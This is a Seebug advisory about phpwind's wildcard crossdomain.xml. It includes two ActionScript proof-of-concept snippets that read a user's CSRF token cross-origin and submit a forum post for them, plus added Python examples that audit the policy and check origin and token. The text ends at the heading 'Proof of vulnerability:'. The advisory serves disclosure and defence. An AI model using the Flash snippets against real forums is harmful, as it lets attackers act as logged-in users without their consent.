Improper phpwind configuration can allow CSRF posting

2013-09-28T00:00:00
ID SSV:94435
Type seebug
Reporter Root
Modified 2013-09-28T00:00:00

Description

Brief description:

Improper phpwind configuration can allow CSRF posting

Detailed description:

Default crossdomain.xml shipped with phpwind:

<?xml version="1.0"?>
<cross-domain-policy>
    <allow-access-from domain="*"/>
    <!-- Flash cross-domain policy; it is recommended to set domain to *.your-site-domain -->
</cross-domain-policy>

The comment does recommend tightening it, but no ordinary site owner is going to edit this file; it would be better if the installer rewrote crossdomain.xml from the request Host directly. With the wildcard in place, a Flash movie on any origin can read authenticated pages of the forum, so the first step is to fetch the CSRF token:
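The following is an added example and not code from the advisory or from phpwind: a small audit of a crossdomain.xml policy that flags the wildcard entry quoted above, together with the host-scoped policy the paragraph says an installer could generate. The hostname forum.example.com and the treatment of "*.host" as covering host plus its subdomains are assumptions of this example.

```python
import xml.etree.ElementTree as ET
from xml.sax.saxutils import quoteattr

# Constructed sample: the permissive policy the advisory quotes as the default.
PERMISSIVE_POLICY = """<?xml version="1.0"?>
<cross-domain-policy>
  <allow-access-from domain="*"/>
</cross-domain-policy>
"""


def _scoped_to_site(pattern, site_host):
    """True if a domain pattern only covers site_host or its subdomains.

    Assumption of this audit: "*.host" is read as host plus subdomains;
    any other pattern must equal site_host exactly.
    """
    if pattern.startswith("*."):
        base = pattern[2:]
        return site_host == base or site_host.endswith("." + base)
    return pattern == site_host


def audit_crossdomain(xml_text, site_host):
    """Return one finding per <allow-access-from> that is broader than site_host.

    An empty list means every entry is scoped to the site; a wildcard entry
    is the condition that lets a foreign Flash movie read the CSRF token.
    """
    root = ET.fromstring(xml_text)
    findings = []
    for el in root.iter("allow-access-from"):
        domain = el.get("domain", "")
        if domain == "*":
            findings.append('domain="*": Flash from any origin may read authenticated responses')
        elif not _scoped_to_site(domain, site_host):
            findings.append("domain=%s is not scoped to %s" % (quoteattr(domain), site_host))
    return findings


def render_restrictive_policy(site_host):
    """Emit a crossdomain.xml limited to site_host and its subdomains,
    the rewrite the advisory suggests an installer could do from Host."""
    return (
        '<?xml version="1.0"?>\n'
        "<cross-domain-policy>\n"
        "  <allow-access-from domain=%s/>\n"
        "</cross-domain-policy>\n"
    ) % quoteattr("*." + site_host)


if __name__ == "__main__":
    host = "forum.example.com"  # constructed hostname, not from the advisory
    for finding in audit_crossdomain(PERMISSIVE_POLICY, host):
        print("FINDING:", finding)
    fixed = render_restrictive_policy(host)
    print(fixed)
    print("findings after rewrite:", audit_crossdomain(fixed, host))
```

Run against the quoted default the audit reports the wildcard; run against the generated policy it reports nothing. The generator deliberately does not accept a raw Host header without validation; an installer should compare it against the configured site domain before writing the file, otherwise a forged Host during setup would end up in the policy.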

[Screenshot Q.png: https://images.seebug.org/upload/201309/281417272339bb55dbba12ebfe356dc5c41e1449.png]

// ActionScript 2 (Flash LoadVars), as posted in the advisory
function gethash() {
    // pull the csrf_token value out of the returned HTML
    function getformhash(txt) {
        txt = txt.split('csrf_token" value="')[1].split('"')[0];
        return txt;
    }
    var result_lv:LoadVars = new LoadVars();
    result_lv.onData = function(txt) {
        if (txt) {
            txt = getformhash(txt);
        } else {
            txt = "Error connecting to server.";
        }
        trace(txt);
    };
    var send_lv:LoadVars = new LoadVars();
    method = 'GET';
    url = "http://localhost:8080/index.php?c=post&fid=2";
    send_lv.sendAndLoad(url, result_lv, method);
}
gethash()

Then post via CSRF. phpwind does not even check the Referer here, so the form can be submitted directly from a foreign domain:
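As an added example (not phpwind's code, and written in Python rather than PHP to keep it self-contained), this shows the two server-side checks whose absence the advisory relies on: rejecting a state-changing request whose Origin or Referer does not name the site, and comparing the submitted csrf_token to the session's token in constant time. The site name, token value and sample request headers are constructed for the example.

```python
import hmac
from urllib.parse import urlsplit


def request_origin_allowed(headers, site_host):
    """Accept a state-changing request only if Origin (preferred) or, failing
    that, Referer names site_host. A request carrying neither header is
    rejected; browsers send at least one of them for a normal form post."""
    origin = headers.get("Origin")
    if origin is not None:
        return urlsplit(origin).hostname == site_host
    referer = headers.get("Referer")
    if referer is not None:
        return urlsplit(referer).hostname == site_host
    return False


def csrf_check(headers, form, session_token, site_host):
    """Origin check plus token check; returns (allowed, reason)."""
    if not request_origin_allowed(headers, site_host):
        return False, "cross-site origin"
    submitted = form.get("csrf_token", "")
    if not session_token or not hmac.compare_digest(submitted, session_token):
        return False, "bad csrf_token"
    return True, "ok"


# Constructed sample data for the doadd request described in the advisory.
SITE = "forum.example.com"
SESSION_TOKEN = "d8e6c3d0f1d8e6c3"  # constructed, stands in for the real token

SAME_SITE_HEADERS = {
    "Origin": "http://forum.example.com",
    "Referer": "http://forum.example.com/index.php?c=post&fid=2",
}
CROSS_SITE_HEADERS = {
    "Referer": "http://other.example.org/page.html",
}
POST_FORM = {
    "csrf_token": SESSION_TOKEN,
    "atc_title": "1380343694",
    "atc_content": "12112123123sdf1",
    "special": "default",
}

if __name__ == "__main__":
    print(csrf_check(SAME_SITE_HEADERS, POST_FORM, SESSION_TOKEN, SITE))
    print(csrf_check(CROSS_SITE_HEADERS, POST_FORM, SESSION_TOKEN, SITE))
    print(csrf_check(SAME_SITE_HEADERS, {"csrf_token": "stale"}, SESSION_TOKEN, SITE))
```

The token is the primary defence and the origin check is a second layer: with the wildcard crossdomain.xml the token itself can be read cross-origin, so the origin check is what still rejects the foreign submission, and once the policy is tightened the token alone suffices again. Checking both costs nothing and means a misconfiguration in one layer does not open the endpoint.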

[Screenshot Q57.png: https://images.seebug.org/upload/201309/2814210375a9d3ec8d9b214e5d677a3827b2caed.png]

// ActionScript 2 (Flash LoadVars), as posted in the advisory
function dopost() {
    var result_lv:LoadVars = new LoadVars();
    result_lv.onData = function(txt) {
        trace(txt);
    };
    var send_lv:LoadVars = new LoadVars();
    method = 'post';
    url = "http://localhost:8080/index.php?c=post&a=doadd&_json=1&fid=2";
    send_lv['csrf_token'] = '{{ csrf_token }}';
    send_lv['atc_title'] = '1380343694';
    send_lv['atc_content'] = '12112123123sdf1';
    send_lv['pid'] = '';
    send_lv['tid'] = '';
    send_lv['special'] = 'default';
    send_lv.sendAndLoad(url, result_lv, method);
}
dopost()

Proof of vulnerability: